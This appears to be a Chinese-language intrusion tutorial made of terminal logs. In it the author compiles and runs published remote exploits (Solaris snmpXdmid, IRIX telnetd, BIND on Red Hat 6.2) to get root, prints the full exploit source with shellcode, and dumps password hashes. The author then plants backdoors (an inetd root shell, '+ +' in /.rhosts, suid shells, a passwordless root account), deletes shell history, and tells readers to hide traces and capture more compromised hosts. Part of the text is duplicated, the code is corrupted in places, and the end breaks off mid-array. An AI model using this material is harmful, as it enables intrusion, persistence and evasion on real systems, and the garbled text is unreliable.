# gcc -o snmp snmp.c
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
Undefined first referenced
symbol in file
xdr_void /var/tmp/cca3rEDd.o
clnttcp_create /var/tmp/cca3rEDd.o
gethostbyname /var/tmp/cca3rEDd.o
xdr_bool /var/tmp/cca3rEDd.o
xdr_u_long /var/tmp/cca3rEDd.o
authsys_create /var/tmp/cca3rEDd.o
inet_addr /var/tmp/cca3rEDd.o
clnt_pcreateerror /var/tmp/cca3rEDd.o
xdr_array /var/tmp/cca3rEDd.o
getsockname /var/tmp/cca3rEDd.o
xdr_char /var/tmp/cca3rEDd.o
xdr_pointer /var/tmp/cca3rEDd.o
ld: fatal: Symbol referencing errors. No output written to snmp (***编译失败***)
collect2: ld returned 1 exit status
# gcc -o snmp snmp.c –lnsl
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
Undefined first referenced
symbol in file
getsockname /var/tmp/ccBaS71K.o
ld: fatal: Symbol referencing errors. No output written to snmp
collect2: ld returned 1 exit status
# gcc -o snmp snmp.c -lnsl –lsocket (***要利用nsl和socket的库进行编译***)
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
# ./snmp
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
usage: ./snmp address [-p port] -v 7|8
#./snmp 192.168.0.4 –v 8 (***192.168.0.4 是台sunos 5.8 sparc的机器***)
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
adr=0x000c8f68 timeout=30 port=928 connected!
sent!
SunOS business 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250
id
uid=0(root) gid=0(root)
echo “+ +” >/.rhosts
echo 'ingreslock stream tcp nowait root /bin/ksh ksh -i' > /tmp/.x
/usr/sbin/inetd -s /tmp/.x
rm -f /tmp/.x
telnet localhost 1524
Trying 127.0.0.1...
Connected to localhost. Escape character is '^]'.
# id
ksh: id^M: not found
# id;
uid=0(root) gid=0(root)
ksh: ^M: not found
# exit;
Connection closed by foreign host.
Exit (***随便装个后门走人***)
#
-------------------------------------------------test--------------------------------------------------------------
SunOS 5.6 5.7 5.8的机器都有了,找找其他系统吧。
什么系统最破呢?
Win2000?
呵呵,我说的是UNIX系列。
告诉大家,IRIX最破~
HOHO~
记得昨天就扫到一台IRIX的破机器呢,我们接着来干掉它~
-------------------------------------------------test--------------------------------------------------------------
# telnet 192.168.0.10
Trying 192.168.0.10...
Connected to 192.168.0.10.
Escape character is '^]'.
IRIX (O2)
login: test
Password:
UX:login: ERROR: Login incorrect
login:^]
telnet> quit
Connection closed.
#cat > telnetd.c (***源程序在http://lsd-pl.net/files/get?IRIX/irx_telnetd ***)
#include
#include
#include
#include
#include
#include
#include
#include
char shellcode[]=
"/x04/x10/xff/xff" /* bltzal $zero, */
"/x24/x02/x03/xf3" /* li $v0,1011 */
"/x23/xff/x02/x14" /* addi $ra,$ra,532 */
"/x23/xe4/xfe/x08" /* addi $a0,$ra,-504 */
"/x23/xe5/xfe/x10" /* addi $a1,$ra,-496 */
"/xaf/xe4/xfe/x10" /* sw $a0,-496($ra) */
"/xaf/xe0/xfe/x14" /* sw $zero,-492($ra) */
"/xa3/xe0/xfe/x0f" /* sb $zero,-497($ra) */
"/x03/xff/xff/xcc" /* syscall */
"/bin/sh"
;
typedef struct{char *vers;}tabent1_t;
typedef struct{int flg,len;int got,g_ofs,subbuffer,s_ofs;}tabent2_t;
tabent1_t tab1[]={
{ "IRIX 6.2 libc.so.1: no patches telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: 1918|2086 telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: 3490|3723|3771 telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: no patches telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.2 libc.so.1: 1918|2086 telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.2 libc.so.1: 3490|3723|3771 telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.3 libc.so.1: no patches telnetd: { "IRIX 6.3 libc.so.1: 2087 telnetd: no patches " },
{ "IRIX 6.3 libc.so.1: 3535|3737|3770 telnetd: no patches " },
{ "IRIX 6.4 libc.so.1: no patches telnetd: no patches " },
{ "IRIX 6.4 libc.so.1: 3491|3769|3738 telnetd: no patches " },
{ "IRIX 6.5-6.5.8m 6.5-6.5.7f telnetd: no patches " },
{ "IRIX 6.5.8f telnetd: no patches " }
};
tabent2_t tab2[]={
{ 0, 0x56, 0x0fb44390, 115, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb483b0, 117, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb50490, 122, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb44390, 115, 0x7fc4d220, 0x14 },
{ 0, 0x56, 0x0fb483b0, 117, 0x7fc4d220, 0x14 },
{ 0, 0x56, 0x0fb50490, 122, 0x7fc4d220, 0x14 },
{ 0, 0x56, 0x0fb4fce0, 104, 0x7fc4d230, 0x14 },
{ 0, 0x56, 0x0fb4f690, 104, 0x7fc4d230, 0x14 },
{ 0, 0x56, 0x0fb52900, 104, 0x7fc4d230, 0x14 },
{ 1, 0x5e, 0x0fb576d8, 88, 0x7fc4cf70, 0x1c },
{ 1, 0x5e, 0x0fb4d6dc, 102, 0x7fc4cf70, 0x1c },
{ 1, 0x5e, 0x7fc496e8, 77, 0x7fc4cf98, 0x1c },
{ 1, 0x5e, 0x7fc496e0, 77, 0x7fc4cf98, 0x1c }
};
char env_value[1024];
int prepare_env(int vers){
int i,adr,pch,adrh,adrl;
char *b;
pch=tab2[vers].got+(tab2[vers].g_ofs*4);
adr=tab2[vers].subbuffer+tab2[vers].s_ofs;
adrh=(adr>>16)-tab2[vers].len;
adrl=0x10000-(adrh&0xffff)+(adr&0xffff)-tab2[vers].len;
b=env_ if(!tab2[vers].flg){
for(i=0;i<1;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch>>((3-i%4)*8))&0xff);
for(i=0;i<4;i++) *b++=(char)((pch+2>>((3-i%4)*8))&0xff);
for(i=0;i<3;i++) *b++=' ';
for(i=0;i
*b++=shellcode[i];
if((*(b-1)==(char)0x02)||(*(b-1)==(char)0xff)) *b++=shellcode[i];
}
sprintf(b,"%%%05dc%%22$hn%%%05dc%%23$hn",adrh,adrl);
}else{
for(i=0;i<5;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch>>((3-i%4)*8))&0xff);
for(i=0;i<4;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch+2>>((3-i%4)*8))&0xff);
for(i=0;i<3;i++) *b++=' ';
for(i=0;i
*b++=shellcode[i];
if((*(b-1)==(char)0x02)||(*(b-1)==(char)0xff)) *b++=shellcode[i];
}
sprintf(b,"%%%05dc%%11$hn%%%05dc%%12$hn",adrh,adrl);
}
b+=strlen(b);
return(b-env_value);
}
main(int argc,char **argv){
char buffer[8192];
int i,c,sck,il,ih,cnt,vers=65;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net//n");
printf("telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all/n/n");
if(argc<2){
printf("usage: %s address [-v 62|63|64|65]/n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"sc:p:v:"))!=-1){
switch(c){
case 'v': vers=atoi(optarg);
}
}
switch(vers){
case 62: il=0;ih=5; break;
case 63: il=6;ih=8; break;
case 64: il=9;ih=10; break;
case 65: il=11;ih=12; break;
default: exit(-1);
}
for(i=il;i<=ih;i++){
printf(".");fflush(stdout);
sck=socket(AF_INET,SOCK_STREAM,0);
adr.sin_family=AF_INET;
adr.sin_port=htons(23);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
cnt=prepare_env(i);
memcpy(buffer,"/xff/xfa/x24/x00/x01/x58/x58/x58/x58/x00",10);
sprintf(&buffer[10],"%s/xff/xf0",env_value);
write(sck,buffer,10+cnt+2);
sleep(1);
memcpy(buffer,"/xff/xfa/x24/x00/x01/x5f/x52/x4c/x44/x00%s/xff/xf0",10);
sprintf(&buffer[10],"%s/xff/xf0",env_value);
write(sck,buffer,10+cnt+2);
if(((cnt=read(sck,buffer,sizeof(buffer)))<2)||(buffer[0]!=(char)0xff)){
printf("warning: telnetd seems to be used with tcp wrapper/n");
}
write(sck,"/bin/uname -a/n",14);
if((cnt=read(sck,buffer,sizeof(buffer)))>0){
printf("/n%s/n/n",tab1[i].vers);
write(1,buffer,cnt);
break;
}
close(sck);
}
if(i>ih) {printf("/nerror: not vulnerable/n");exit(-1);}
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
^D
# gcc -o telnetd telnetd.c
telnetd.c:33: parse error before `IRIX'
telnetd.c:37: malformed floating constant
telnetd.c:37: nondigits in number and not hexadecimal
telnetd.c:37: malformed floating constant
telnetd.c:38: malformed floating constant
telnetd.c:77: nondigits in number and not hexadecimal
… (***因为粘贴文本出错,一大堆出错信息***)
# vi telnetd.c (***只好用vi来编辑程序***)
"telnetd.c" [New file]
#include
#include
#include
…
(***重新粘贴一遍***)
…
"telnetd.c" [New file] 188 lines, 6738 characters
# gcc -o telnetd telnetd.c
Undefined first referenced
symbol in file
socket /var/tmp/ccuoeAph.o
gethostbyname /var/tmp/ccuoeAph.o
inet_addr /var/tmp/ccuoeAph.o
connect /var/tmp/ccuoeAph.o
ld: fatal: Symbol referencing errors. No output written to telnetd
collect2: ld returned 1 exit status
# gcc -o telnetd telnetd.c -lsocket -lnsl
# ./telnetd
copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/
telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all
usage: ./telnetd address [-v 62|63|64|65]
# ./telnetd 192.168.0.10 -v 65
copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/
telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all
.
IRIX 6.5-6.5.8m 6.5-6.5.7f telnetd: no patches
IRIX O2 6.5 05190004 IP32 (***溢出成功啦***)
id
uid=0(root) gid=0(sys)
cat /etc/passwd
root:mmanI4kyarAEA:0:0:Super-User:/:/usr/bin/tcsh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
cmwlogin:*:0:994:CMW Login UserID:/usr/CMW:/sbin/csh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
daemon:*:1:1:daemons:/:/dev/null
bin:*:2:2:System Tools Owner:/bin:/dev/null
uucp:*:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh
sys:*:4:0:System Activity Owner:/var/adm:/bin/sh
adm:*:5:3:Accounting Files Owner:/var/adm:/bin/sh
lp::9:9:Print Spooler Owner:/var/spool/lp:/bin/sh ***不少人进来过呢
nuucp::10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico *
auditor:*:11:0:Audit Activity Owner:/auditor:/bin/sh
dbadmin:*:12:0:Security Database Owner:/dbadmin:/bin/sh
sgiweb:*:13:60001:SGI Web Applications:/var/www/htdocs:/bin/csh
rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh
EZsetup::992:998:System Setup:/var/sysadmdesktop/EZsetup:/bin/csh *
demos::993:997:Demonstration User:/usr/demos:/bin/csh *
OutOfBox::995:997:Out of Box Experience:/usr/people/OutOfBox:/bin/csh *
guest::998:998:Guest Account:/usr/people/guest:/bin/csh *
4Dgifts:*:999:998:4Dgifts Account:/usr/people/4Dgifts:/bin/csh
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:60001:60001:original nobody uid:/dev/null:/dev/null
informix:*:49999:777:Informix SA 3.0:/usr/sgi/informix:/bin/csh
posuser:gyo7hUq9BFNYE:55555:20:::
antoni:zUzbvPoZ6HC4g:23117:20:antoniWang:/usr/people/antoni:/bin/csh
#mkdir /usr/lib/... (***有这么多用户可以登陆,我们做个suid root shell就可以啦。***)
cp /bin/ksh /usr/lib/.../.x
chmod +s /usr/lib/.../.x
exit
#
-------------------------------------------------test--------------------------------------------------------------
在SunOS 5.7平台下攻击IRIX 6.5 系统成功完成。:)
我们来找几台Linux 玩玩。找Redhat吧,漏洞多一些,比如rpc.statd wuftp bind lpd等。:P
我们同样以这个SunOs 5.7做为我们攻击Linux的平台。Lsd写的exploit通用性真不错。
这次我们用bind远程溢出来攻击redhat 6.2
不过因为前段时间的worm,bind的成功率已经很小啦。
大家可以试试其它的远程溢出~~
-------------------------------------------------test--------------------------------------------------------------
#cat > bind.c (***源程序在http://lsd-pl.net/files/get?LINUX/linx86_bind ***)
#include
#include
#include
#include
#include
#include
#include
char msg[]={
0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x01,0x20,0x20,0x20,0x20,0x02,0x61
};
char asmcode[]=
"/x3f" /* label len 63 */
"/x90/x90/x90" /* padding */
"/xeb/x3b" /* jmp */
"/x31/xdb" /* xorl %ebx,%ebx */
"/x5f" /* popl %edi */
"/x83/xef/x7c" /* sub $0x7c,%edi */
"/x8d/x77/x10" /* leal 0x10(%edi),%esi */
"/x89/x77/x04" /* movl %esi,0x4(%edi) */
"/x8d/x4f/x20" /* leal 0x20(%edi),%ecx */
"/x89/x4f/x08" /* movl %ecx,0x8(%edi) */
"/xb3/x10" /* movb $0x10,%bl */
"/x89/x19" /* movl %ebx,(%ecx) */
"/x31/xc9" /* xorl %ecx,%ecx */
"/xb1/xff" /* movb $0xff,%cl */
"/x89/x0f" /* movl %ecx,(%edi) */
"/x51" /* pushl %ecx */
"/x31/xc0" /* xorl %eax,%eax */
"/xb0/x66" /* movb $0x66,%al */
"/xb3/x07" /* movb $0x7,%bl */
"/x89/xf9" /* movl %edi,%ecx */
"/xcd/x80" /* int $0x80 */
"/x59" /* popl %ecx */
"/x31/xdb" /* xorl %ebx,%ebx */
"/x39/xd8" /* cmpl %ebx,%eax */
"/x75/x0a" /* jne */
"/x66/xbb/x12/x34" /* movw $0x1234,%bx */
"/x66/x39/x5e/x02" /* cmpw %bx,0x2(%esi) */
"/x74/x08" /* je */
"/xe2/xe0" /* loop */
"/x3f" /* label len 63 */
"/xe8/xc0/xff/xff/xff" /* call */
"/x89/xcb" /* movl %ecx,%ebx */
"/x31/xc9" /* xorl %ecx,%ecx */
"/xb1/x03" /* movb $0x03,%cl */
"/x31/xc0" /* xorl %eax,%eax */
"/xb0/x3f" /* movb $0x3f,%al */
"/x49" /* decl %ecx */
"/xcd/x80" /* int $0x80 */
"/x41" /* incl %ecx "/xe2/xf6" /* loop */
"/xeb/x14" /* jmp */
"/x31/xc0" /* xorl %eax,%eax */
"/x5b" /* popl %ebx */
"/x8d/x4b/x14" /* leal 0x14(%ebx),%ecx */
"/x89/x19" /* movl %ebx,(%ecx) */
"/x89/x43/x18" /* movl %eax,0x18(%ebx) */
"/x88/x43/x07" /* movb %al,0x7(%ebx) */
"/x31/xd2" /* xorl %edx,%edx */
"/xb0/x0b" /* movb $0xb,%al */
"/xcd/x80" /* int $0x80 */
"/xe8/xe7/xff/xff/xff" /* call */
"/bin/sh"
"/x90/x90/x90/x90" /* padding */
"/x90/x90/x90/x90"
;
int rev(int a){
int i=1;
if((*(char*)&i)) return(a);
return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}
int main(int argc,char **argv){
char buffer[1024],*b;
int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net//n");
printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86/n/n");
if(argc<2){
printf("usage: %s address [-s][-e]/n",argv[0]);
printf(" -s send infoleak packet/n");
printf(" -e send exploit packet/n");
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"se"))!=-1){
switch(c){
case 's': flag=1;break;
case 'e': flag=2;
}
}
if(flag==-1) exit(-1);
adr.sin_family=AF_INET;
adr.sin_port=htons(53);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if((hp=gethostbyname(argv[1]))==NULL) {
errno=EADDRNOTAVAIL;goto err;
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck[0]=socket(AF_INET,SOCK_DGRAM,0);
sck[1]=socket(AF_INET,SOCK_STREAM,0);
if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
i=sizeof(struct sockaddr_in);
if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck[1],(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck[1],(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
asmcode[4+48+2]=(unsigned char)((n>>8)&0xff);
asmcode[4+48+3]=(unsigned char)(n&0xff);
if(write(sck[0],msg,sizeof(msg))==-1) goto err;
if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
printf("stack dump:/n");
for(i=0;i<(cnt-512);i++){
printf("%s%02x ",(i&&(!(i%16)))?"/n":"",(unsigned char)buffer[512+i]);
}
printf("/n/n");
fp=rev(*(unsigned int*)&buffer[532]);
ofs=(0xfe)-((fp-(fp&0xffffff00))&0xff);
cnt=163;
if((buffer[512+20+2]!=(char)0xff)&&(buffer[512+20+3]!=(char)0xbf)){
printf("system does not seem to be a vulnerable linux/n");exit(1);
}
if(flag==1){
printf("system seems to be running bind 8.2.x on a linux/n");exit(-1);
}
if(cnt<(ofs+28)){
printf("frame ptr is too low to be successfully exploited/n");exit(-1);
}
jmp=rev(fp-586);
ptr6=rev((fp&0xffffff00)-12);
fp=rev(fp&0xffffff00);
printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);
b=buffer;
memcpy(b,"/xab/xcd/x01/x00/x00/x02/x00/x00/x00/x00/x00/x01",12);b+=12;
for(i=0;i
for(i=0;i<(128>>1);i++,b++) *b++=0x01;
memcpy(b,"/x00/x00/x01/x00/x01",5);b+=5;
for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;
*b++=28;
memcpy(b,"/x06/x00/x00/x00",4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,"/x06/x00/x00/x00",4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,&ptr6,4);b+=4;
cnt-=ofs+28;
for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;
memcpy(b,"/x00/x00/x01/x00/x01/x00/x00/xfa/xff",9);b+=9;
if(write(sck[0],buffer,b-buffer)==-1) goto err;
sleep(1);printf("sent!/n");
write(sck[1],"/bin/uname -a/n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck[1],&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck[1],buf,cnt);
}
if(FD_ISSET(sck[1],&fds)){
if((cnt=read(sck[1],buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
exit(0);
err:
perror("error");exit(-1);
}
^D
# gcc -o bind bind.c -lnsl -lsocket
# ./bind
copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86
usage: ./bind address [-s][-e]
-s send infoleak packet
-e send exploit packet
#./bind 192.168.0.20 -e
copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86
stack dump:
42 24 08 08 02 00 b1 ed ca 42 c8 06 95 d0 15 c0
00 cb fa c0 a8 fc ff bf d6 58 08 08 90 3f 0d 08
f4 a4 10 40 16 00 00 00 01 00 00 00 90 3f 0d 08
05 00 00 00 e0 e7 0b 08 16 00 00 00 01 00 00 00
a0 e0 05 08 f4 a4 10 40 c4 fc ff bf 60 e9 0c 08
00 00 00 00 c8 fd ff bf c8 fd ff bf 61 d6 05 08
90 3f 0d 08 bc 76 10 40 b4 11 10 40 14 fe ff bf
01 00 00 00 bc 76 10 40
frame ptr=0xbffffc00 adr=bffffa5e ofs=86 port=e1fa connected! sent!
Linux localhost.localdomain 2.2.14-5.0 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Id
uid=0(root) gid=0(root)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
gdm:x:42:42::/home/gdm:/bin/bash
william:x:500:500:William Wang:/home/william:/bin/bash
www:x:688:501:web user:/home/www:/bin/bash
xeye:x:689:501:Xeye web user:/home/xeye:/bin/bash
td_ftp:x:655:50:TD Bank FTP Client:/home/td_bank:/bin/bash
cyberplex:x:690:100:Cyber:/home/cyberplex:/bin/bash
echo “test::1:0::/:/bin/bash” > /etc/passwd
telnet localhost
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: test
bash$ id
uid=1(bin) gid=0(root) groups=0(root)
bash$ exit
logout
Connection closed by foreign host.
mkdir /usr/lib/…
cp /bin/sh /usr/lib/…/.x
chmod +s /usr/lib/…/.x
exit
#rm –rf /tmp/*.c
#mv bind /usr/lib/…
#mv test /usr/lib/…
#mv lpset /usr/lib/…
#mv snmp /usr/lib/…
#cd
#rm –rf .sh_history /.sh_history
#chmod 777 /usr/lib/…
#exit
$exit
-------------------------------------------------test--------------------------------------------------------------
省略了很多,如后门安装和脚印的擦除等。
其实入侵一个系统后更要注意保持自己在系统上的权限,所以清除日志以免被发现,和安放后门以便再次进入这个系统
都是很重要的。
因为以前写过这方面的教程,就不再写了。
大家慢慢提高自己的技术吧。
有时间就去扩散战果,比如Redhat 7.0和该死的freebsd。
自己想办法哦。
肉鸡找回来几台,最后一篇入侵教程总算也写完了,再见啦~
以后也许会写一些技术分析的文章。
大家好运…
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
Undefined first referenced
symbol in file
xdr_void /var/tmp/cca3rEDd.o
clnttcp_create /var/tmp/cca3rEDd.o
gethostbyname /var/tmp/cca3rEDd.o
xdr_bool /var/tmp/cca3rEDd.o
xdr_u_long /var/tmp/cca3rEDd.o
authsys_create /var/tmp/cca3rEDd.o
inet_addr /var/tmp/cca3rEDd.o
clnt_pcreateerror /var/tmp/cca3rEDd.o
xdr_array /var/tmp/cca3rEDd.o
getsockname /var/tmp/cca3rEDd.o
xdr_char /var/tmp/cca3rEDd.o
xdr_pointer /var/tmp/cca3rEDd.o
ld: fatal: Symbol referencing errors. No output written to snmp (***编译失败***)
collect2: ld returned 1 exit status
# gcc -o snmp snmp.c –lnsl
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
Undefined first referenced
symbol in file
getsockname /var/tmp/ccBaS71K.o
ld: fatal: Symbol referencing errors. No output written to snmp
collect2: ld returned 1 exit status
# gcc -o snmp snmp.c -lnsl –lsocket (***要利用nsl和socket的库进行编译***)
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
# ./snmp
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
usage: ./snmp address [-p port] -v 7|8
#./snmp 192.168.0.4 –v 8 (***192.168.0.4 是台sunos 5.8 sparc的机器***)
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
adr=0x000c8f68 timeout=30 port=928 connected!
sent!
SunOS business 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250
id
uid=0(root) gid=0(root)
echo “+ +” >/.rhosts
echo 'ingreslock stream tcp nowait root /bin/ksh ksh -i' > /tmp/.x
/usr/sbin/inetd -s /tmp/.x
rm -f /tmp/.x
telnet localhost 1524
Trying 127.0.0.1...
Connected to localhost. Escape character is '^]'.
# id
ksh: id^M: not found
# id;
uid=0(root) gid=0(root)
ksh: ^M: not found
# exit;
Connection closed by foreign host.
Exit (***随便装个后门走人***)
#
-------------------------------------------------test--------------------------------------------------------------
SunOS 5.6 5.7 5.8的机器都有了,找找其他系统吧。
什么系统最破呢?
Win2000?
呵呵,我说的是UNIX系列。
告诉大家,IRIX最破~
HOHO~
记得昨天就扫到一台IRIX的破机器呢,我们接着来干掉它~
-------------------------------------------------test--------------------------------------------------------------
# telnet 192.168.0.10
Trying 192.168.0.10...
Connected to 192.168.0.10.
Escape character is '^]'.
IRIX (O2)
login: test
Password:
UX:login: ERROR: Login incorrect
login:^]
telnet> quit
Connection closed.
#cat > telnetd.c (***源程序在http://lsd-pl.net/files/get?IRIX/irx_telnetd ***)
#include
#include
#include
#include
#include
#include
#include
#include
char shellcode[]=
"/x04/x10/xff/xff" /* bltzal $zero, */
"/x24/x02/x03/xf3" /* li $v0,1011 */
"/x23/xff/x02/x14" /* addi $ra,$ra,532 */
"/x23/xe4/xfe/x08" /* addi $a0,$ra,-504 */
"/x23/xe5/xfe/x10" /* addi $a1,$ra,-496 */
"/xaf/xe4/xfe/x10" /* sw $a0,-496($ra) */
"/xaf/xe0/xfe/x14" /* sw $zero,-492($ra) */
"/xa3/xe0/xfe/x0f" /* sb $zero,-497($ra) */
"/x03/xff/xff/xcc" /* syscall */
"/bin/sh"
;
typedef struct{char *vers;}tabent1_t;
typedef struct{int flg,len;int got,g_ofs,subbuffer,s_ofs;}tabent2_t;
tabent1_t tab1[]={
{ "IRIX 6.2 libc.so.1: no patches telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: 1918|2086 telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: 3490|3723|3771 telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: no patches telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.2 libc.so.1: 1918|2086 telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.2 libc.so.1: 3490|3723|3771 telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.3 libc.so.1: no patches telnetd: { "IRIX 6.3 libc.so.1: 2087 telnetd: no patches " },
{ "IRIX 6.3 libc.so.1: 3535|3737|3770 telnetd: no patches " },
{ "IRIX 6.4 libc.so.1: no patches telnetd: no patches " },
{ "IRIX 6.4 libc.so.1: 3491|3769|3738 telnetd: no patches " },
{ "IRIX 6.5-6.5.8m 6.5-6.5.7f telnetd: no patches " },
{ "IRIX 6.5.8f telnetd: no patches " }
};
tabent2_t tab2[]={
{ 0, 0x56, 0x0fb44390, 115, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb483b0, 117, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb50490, 122, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb44390, 115, 0x7fc4d220, 0x14 },
{ 0, 0x56, 0x0fb483b0, 117, 0x7fc4d220, 0x14 },
